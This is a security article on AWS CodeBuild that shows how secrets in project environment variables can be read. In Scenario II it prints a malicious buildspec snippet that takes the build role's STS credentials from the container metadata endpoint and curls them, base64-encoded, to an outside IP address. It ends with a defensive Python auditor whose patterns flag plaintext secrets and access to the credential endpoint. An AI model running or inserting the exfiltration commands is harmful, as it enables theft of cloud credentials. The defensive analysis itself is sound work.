Cloudbuild - Security

Last updated 1 year ago

Security

We will discuss some interesting security implications of CodeBuild.

Scenario I - Secrets

Secrets often turn up in a CodeBuild project's environment variables or in its buildspec.yml. To view them, you need to know the project name and then make the following API call:

Here we assume the project name is securitylabs-article.

aws codebuild batch-get-projects --names securitylabs-articles  --region us-east-2

The API call outputs the buildspec.yml and the environment variables configured in the project.

Scenario II - Stealing STS Tokens

A malicious buildspec.yml can be used to steal the STS tokens of the role attached to CodeBuild.

The commands below can be added to the buildspec to exfiltrate CodeBuild's STS credentials:

curl -qL -o aws_credentials.json http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI > aws_credentials.json
aws configure set region 'ap-south-1'
aws configure set aws_access_key_id `jq -r '.AccessKeyId' aws_credentials.json`
aws configure set aws_secret_access_key `jq -r '.SecretAccessKey' aws_credentials.json`
aws configure set aws_session_token `jq -r '.Token' aws_credentials.json`
encoded=$(cat ~/.aws/credentials | base64 -w 0)
curl "http://18.189.180.144:8000/&stuff=$encoded"

The first curl request to 169.254.170.2 returns the STS credentials. The $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI environment variable contains the credentials path in the format /v2/credentials/<build_id>; since the build ID is dynamic and not easy to guess, we use the global environment variable to fetch the credential path.

Once the STS tokens are saved in the aws_credentials.json file, we configure the AWS CLI with the extracted credentials; finally, ~/.aws/credentials is base64 encoded and passed to our server at 18.189.180.144 to exfiltrate the STS tokens.

The screenshot below shows the base64-encoded credentials that were exfiltrated out of CodeBuild.
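For reviewing your own projects against both scenarios, the following added example (not code from the original page) audits the JSON returned by batch-get-projects for PLAINTEXT environment variables that look like secrets and for inline buildspec lines that touch the container credential endpoint. The sample response, the project name example-project, and the name patterns are constructed assumptions.

```python
import json
import re

# Constructed sample shaped like `aws codebuild batch-get-projects` output.
SAMPLE = json.dumps({"projects": [{
    "name": "example-project",  # hypothetical project name
    "source": {"buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n"
               "      - curl http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\n"
               "      - make test\n"},
    "environment": {"environmentVariables": [
        {"name": "DB_PASSWORD", "value": "constructed-value", "type": "PLAINTEXT"},
        {"name": "API_TOKEN", "value": "/ci/api-token", "type": "PARAMETER_STORE"},
        {"name": "STAGE", "value": "dev", "type": "PLAINTEXT"},
        # AWS documentation placeholder key, not a real credential.
        {"name": "DEPLOY_ID", "value": "AKIAIOSFODNN7EXAMPLE", "type": "PLAINTEXT"},
    ]},
}]})

# Assumed heuristics: secret-looking variable names and AWS access key ID shapes.
SECRET_NAME = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY)", re.I)
ACCESS_KEY_ID = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
CRED_ENDPOINT = re.compile(r"169\.254\.170\.2|AWS_CONTAINER_CREDENTIALS_RELATIVE_URI")


def audit_projects(raw):
    """Return (project, kind, detail) findings for one batch-get-projects response."""
    findings = []
    for project in json.loads(raw).get("projects", []):
        name = project.get("name", "<unnamed>")
        env = project.get("environment", {}).get("environmentVariables", [])
        for var in env:
            # PARAMETER_STORE / SECRETS_MANAGER values are references, not the secret.
            if var.get("type", "PLAINTEXT") != "PLAINTEXT":
                continue
            if SECRET_NAME.search(var.get("name", "")) or ACCESS_KEY_ID.search(var.get("value", "")):
                findings.append((name, "plaintext-secret", var.get("name", "<unnamed>")))
        # Only inline buildspecs appear here; a file path in this field yields no hits.
        buildspec = project.get("source", {}).get("buildspec") or ""
        for lineno, line in enumerate(buildspec.splitlines(), 1):
            if CRED_ENDPOINT.search(line):
                findings.append((name, "credential-endpoint-access", f"buildspec line {lineno}"))
    return findings


if __name__ == "__main__":
    for finding in audit_projects(SAMPLE):
        print(*finding, sep="\t")
```

Variables flagged as plaintext-secret are candidates for moving to the PARAMETER_STORE or SECRETS_MANAGER type, and a buildspec stored in the repository has to be scanned there, since this field then holds only its path.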